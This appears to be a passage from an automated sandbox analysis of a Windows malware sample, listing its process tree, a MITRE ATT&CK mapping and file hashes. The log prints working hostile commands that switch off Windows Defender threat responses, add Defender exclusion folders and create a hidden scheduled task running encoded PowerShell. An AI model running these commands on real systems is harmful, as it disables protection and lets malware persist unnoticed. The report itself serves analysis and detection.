C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:7624
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:7468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5976
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4448
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5376
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:7372
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5852
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4352
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:7400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:7908
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:6768
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:6088
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:6712
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5672 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3084
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:192
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:7188
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:6372
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KmXbIhtWbIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KmXbIhtWbIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MnOxAeNoQdUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MnOxAeNoQdUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bRTZqcBYvMDSC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bRTZqcBYvMDSC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWqpiVgDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWqpiVgDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xIEXRqWjchMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xIEXRqWjchMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ojjKVxSmzoxRqFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ojjKVxSmzoxRqFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mgdBYFJOGqDaUVoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mgdBYFJOGqDaUVoC\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6520 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KmXbIhtWbIE" /t REG_DWORD /d 0 /reg:323⤵PID:4572
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KmXbIhtWbIE" /t REG_DWORD /d 0 /reg:324⤵PID:7444
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KmXbIhtWbIE" /t REG_DWORD /d 0 /reg:643⤵PID:1564
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MnOxAeNoQdUn" /t REG_DWORD /d 0 /reg:323⤵PID:5752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MnOxAeNoQdUn" /t REG_DWORD /d 0 /reg:643⤵PID:4656
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRTZqcBYvMDSC" /t REG_DWORD /d 0 /reg:323⤵PID:7156
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRTZqcBYvMDSC" /t REG_DWORD /d 0 /reg:643⤵PID:6528
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWqpiVgDU" /t REG_DWORD /d 0 /reg:323⤵PID:7836
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWqpiVgDU" /t REG_DWORD /d 0 /reg:643⤵
- Adds Run key to start application
PID:4108 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xIEXRqWjchMU2" /t REG_DWORD /d 0 /reg:323⤵PID:4752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xIEXRqWjchMU2" /t REG_DWORD /d 0 /reg:643⤵PID:7336
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR" /t REG_DWORD /d 0 /reg:323⤵PID:5540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xJUYJWqCaffzAAwCFTR" /t REG_DWORD /d 0 /reg:643⤵PID:5876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ojjKVxSmzoxRqFVB /t REG_DWORD /d 0 /reg:323⤵PID:6464
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ojjKVxSmzoxRqFVB /t REG_DWORD /d 0 /reg:643⤵PID:6972
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo /t REG_DWORD /d 0 /reg:323⤵PID:7180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\unjegWDdjmlvo /t REG_DWORD /d 0 /reg:643⤵PID:5600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM /t REG_DWORD /d 0 /reg:323⤵PID:7496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\StaKeEcTUUQSXRfzM /t REG_DWORD /d 0 /reg:643⤵PID:6440
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mgdBYFJOGqDaUVoC /t REG_DWORD /d 0 /reg:323⤵PID:8000
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mgdBYFJOGqDaUVoC /t REG_DWORD /d 0 /reg:643⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1140 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gKKEzsrpU" /SC once /ST 01:56:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gKKEzsrpU"2⤵PID:3340
-
C:\Users\Admin\AppData\Roaming\airgjjrC:\Users\Admin\AppData\Roaming\airgjjr1⤵PID:6896
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:1008
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\ACAD.tmp.exeC:\Users\Admin\AppData\Local\Temp\ACAD.tmp.exe1⤵PID:7320
-
C:\Users\Admin\AppData\Local\Temp\BC4E.tmp.exeC:\Users\Admin\AppData\Local\Temp\BC4E.tmp.exe1⤵PID:5480
-
C:\Users\Admin\AppData\Local\Temp\D7D6.tmp.exeC:\Users\Admin\AppData\Local\Temp\D7D6.tmp.exe1⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\ED72.tmp.exeC:\Users\Admin\AppData\Local\Temp\ED72.tmp.exe1⤵
- Suspicious use of SetThreadContext
PID:6884 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵PID:4504
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵PID:2108
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6760
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:6132
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7224
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:4272
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4652
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5056
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6028
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:7068
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
PID:5608
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7160
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:7920
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7932
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
2Impair Defenses
1Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD58c19ddc7cba756dabfdf580493969c84
SHA1e25f9e4b9278f6f01bab7ced704c0d77a5f7db98
SHA256c478f117a5bcdfddffd99c8ba8779dc6d777a9ce44fae4adf64405a20eca675b
SHA512da9b82e596b6cfef35441747198317527bafde2e58d8ede785f5090889b5add23ee2f2153be9986e144c1275128f2adb78304272675e2501a3938723add96862
-
MD5
d3a8cea413d41092d9dd463ea5878345
SHA179d29dc1b1375116f2a6b9800d236a1bcda5fecc
SHA25669bdbe5d97c81b207f5b1089f18014a9ca6f276a91ecc213df917debe62ccd4e
SHA512abc0849efc4a2ba196b213b6cede086ffb970de8a206e4311b595d999ead6df8ab515509f513a4f816e300d704c4228527d1554e511b4543cba1a654985c84bf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD500dce674e69d868738126653ed6361c9
SHA18e5c4d6c70962df0a290e907f0178e1f4746acaa
SHA25626c5310ed67aeb8b45baecf5ebe40a7fad3a0f4c353ae62d38a614ce989645d6
SHA5127bf177602a70215d7c095eebc350d3c5a672b337bdfacddd71b5565466fd4d3c6d7c5aabb0df558085da5e7a1406aecdf4eaa697144844b51b0ff2cded2721a1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5dd2b6242df4d1499196c6cc3414c4943
SHA1d7156cf55e3f26fccebef08e477f3172fdae7077
SHA2561c46bd2d19464fbbc6b5ada9eb62177f2bb24114b52512fac51f12e2b7e2181a
SHA512e1f557ed856d9382ddf9d7ba3b9bdf3301f85d833a5a8767ccbd1018e76f0e2a9dea6a295fa4b920276aa060b451b6ddb5996de98350db28ca22ea700b20e1e6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
MD5f9279b68682629310973f4a45d26a6e6
SHA1bdeb3cfe455ac7d46a1879a8c8d667d023e74eff
SHA256aeb104d27bbb68965400c753056822ea86fd443911c2b0adffbb37bf0a3e668d
SHA512df3d294d1915a52fbb2e77ec4e01fc238cce128866be0ac7968f37bf40b7c9839f7a891d29f6d9baa87374ddf247c96c2fab145dfbd132291ac766dea6d3fb3e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD519bb74680c0579031beff16e3ee1578e
SHA1284d45b0e348aa6750b79ccdef0faf4e5c0af8e6
SHA2567b5bd75c9f5eb0dd0dcefe3aafba5c5e79de9cd16a24ff90350aa9a19fb9feb6
SHA5126e762ecdc05668ddc9351e12abac1566f361650ad6c24dd5ad148ee8bd6f2b3dc0fe3476414c5f6530ee627e984860c564df24d69dca18e3673d0f6837047650
-
MD5
fa65eca2a4aba58889fe1ec275a058a8
SHA10ecb3c6e40de54509d93570e58e849e71194557a
SHA25695e69d66188dd8287589817851941e167b0193638f4a7225c73ffbd3913c0c2e
SHA512916899c5bfc2d1bef93ab0bf80a7db44b59a132c64fa4d6ab3f7d786ad857b747017aab4060e5a9a77775587700b2ac597c842230172a97544d82521bfc36dff
-
MD5
e8d6b509383ba10886ded570ec61ad48
SHA143b0fdbc78c1b8ad96aa9b3cc9ae831afbe7d6eb
SHA2567ad1c6987ba92daa9d0e84f666c563fb53292b6653538082dd43dad250bbdd70
SHA51208d0acaa8b3e1e4b30d75930ce14b2f6229d75e0c5a71e72d9c6507160a61a020bea5abc1f730c7ccb51d6a8e5ea67d6285e4978ba85fe91ec010d8e8d2d27f2
-
MD5
e8d6b509383ba10886ded570ec61ad48
SHA143b0fdbc78c1b8ad96aa9b3cc9ae831afbe7d6eb
SHA2567ad1c6987ba92daa9d0e84f666c563fb53292b6653538082dd43dad250bbdd70
SHA51208d0acaa8b3e1e4b30d75930ce14b2f6229d75e0c5a71e72d9c6507160a61a020bea5abc1f730c7ccb51d6a8e5ea67d6285e4978ba85fe91ec010d8e8d2d27f2
-
MD5
785fe3674ffa6e98a2ccc6b1c94f2e96
SHA1f603f337d7cef1529fb7315ba5edeb71f54ca8e5
SHA2565300e6e75791b79ead3f48b1e39c56612d684d42827a54c24b7148b977feedc1
SHA5123010dea2098e0b39725f1c00d50fdf95bddb6a42be11494f3bc09acf6fb9ff0e3a691320abe7dd1a72accb5cca14107e8ff987911b24916232e942176b0df129
-
MD5
785fe3674ffa6e98a2ccc6b1c94f2e96
SHA1f603f337d7cef1529fb7315ba5edeb71f54ca8e5
SHA2565300e6e75791b79ead3f48b1e39c56612d684d42827a54c24b7148b977feedc1
SHA5123010dea2098e0b39725f1c00d50fdf95bddb6a42be11494f3bc09acf6fb9ff0e3a691320abe7dd1a72accb5cca14107e8ff987911b24916232e942176b0df129
